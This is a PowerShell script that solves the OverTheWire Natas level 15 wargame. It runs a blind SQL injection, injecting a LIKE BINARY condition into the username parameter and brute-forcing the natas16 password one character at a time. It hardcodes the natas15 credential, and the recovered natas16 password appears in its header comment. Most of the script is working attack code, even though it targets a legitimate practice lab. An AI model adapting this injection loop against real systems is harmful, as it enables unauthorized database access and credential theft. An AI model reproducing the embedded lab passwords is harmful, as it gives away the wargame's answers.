#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh%
# Recovers the natas16 password one character at a time by asking the
# natas15 page a yes/no question per candidate character.
#
# Returns: the accumulated password string once every candidate character
#          has been rejected for the current position.
#
# Each position costs up to one request per entry of the candidate array, so a
# run shows up server-side as a long series of near-identical requests that
# differ only in the last character of the username parameter.
# NOTE(review): this only works if the server places the username parameter
# into its SQL statement unescaped; a parameterized query would remove the
# yes/no oracle. Confirm against the level's source.
Function BruteForce-Password() {
    $credentials = Get-AuthorizedCredentials
    $candidates = Create-CharacterArray
    $password = ''
    $index = 0

    while ($true) {
        $testCharacter = $candidates[$index]

        # Injected condition: the user natas16 exists AND its password starts
        # (case-sensitively, via LIKE BINARY) with the known prefix plus the
        # character under test.
        $sqlQuery = "natas16`" AND password LIKE BINARY `"$password$testCharacter%"

        if ((Test-Password $credentials $sqlQuery) -eq $true) {
            $password += $testCharacter
            Write-Host "PASSED - Adding '$testCharacter' to password."
            Write-Host "PASSWORD: $password"
            # Next position: start again from the first candidate.
            $index = 0
        } else {
            Write-Host "FAILED - '$testCharacter' does not match the current position. Testing next character"
            $index++
        }

        # No candidate extended the prefix, so the prefix is treated as the
        # whole password.
        if ($index -ge $candidates.length) {
            Write-Host "All possible characters have been exhausted. End of password has been reached."
            return $password
        }
    }
}
# Builds the PSCredential used to authenticate to
# http://natas15.natas.labs.overthewire.org.
#
# Returns: a System.Management.Automation.PSCredential for user 'natas15'.
#
# NOTE(review): the password is a literal in the script, so anyone who can
# read the file has it. Reading it from an environment variable or prompting
# with Get-Credential would keep it out of the source.
Function Get-AuthorizedCredentials() {
    # -AsPlainText -Force is required to turn a literal into a SecureString.
    $secret = ConvertTo-SecureString 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' -AsPlainText -Force
    return New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList 'natas15', $secret
}
# Builds the candidate set tried at each password position.
#
# Returns: an array of 62 entries in the order A-Z, a-z, 0-9. The letters are
#          [char] values; the digits are the integers 0 through 9, which
#          become '0'..'9' when interpolated into a string.
Function Create-CharacterArray() {
    $upper = [char[]]([int][char]'A'..[int][char]'Z')
    $lower = [char[]]([int][char]'a'..[int][char]'z')
    $digits = 0..9
    return $upper + $lower + $digits
}
# Sends one request to the natas15 page and reports whether the response
# says the queried user exists.
#
# Parameters:
#   $credentials - PSCredential passed to Invoke-WebRequest via -Credential.
#   $sqlQuery    - text placed, as-is, in the 'username' query-string parameter.
# Returns: $true when the response body contains the string 'exists',
#          otherwise $false.
#
# NOTE(review): the URI is plain http, so the credential and the query travel
# unencrypted. $sqlQuery is interpolated into the URI without URL-encoding.
Function Test-Password($credentials, $sqlQuery) {
    # The method is POST, but the parameters are carried in the query string.
    $targetUri = "http://natas15.natas.labs.overthewire.org/index.php?&debug&username=$sqlQuery"
    $httpResponse = Invoke-WebRequest -Method 'POST' -Uri $targetUri -Credential $credentials

    # The presence of 'exists' in the body is the yes/no signal.
    return $httpResponse.Content.Contains('exists')
}
# Script entry: run the recovery once and report the result and the elapsed
# wall-clock time.
$start = Get-Date
$crackedPassword = BruteForce-Password
$end = Get-Date

# Same value as $end - $start: a TimeSpan covering the whole run.
$totalTime = New-TimeSpan -Start $start -End $end

Write-Host "The cracked password is: $($crackedPassword)"
Write-Host $totalTime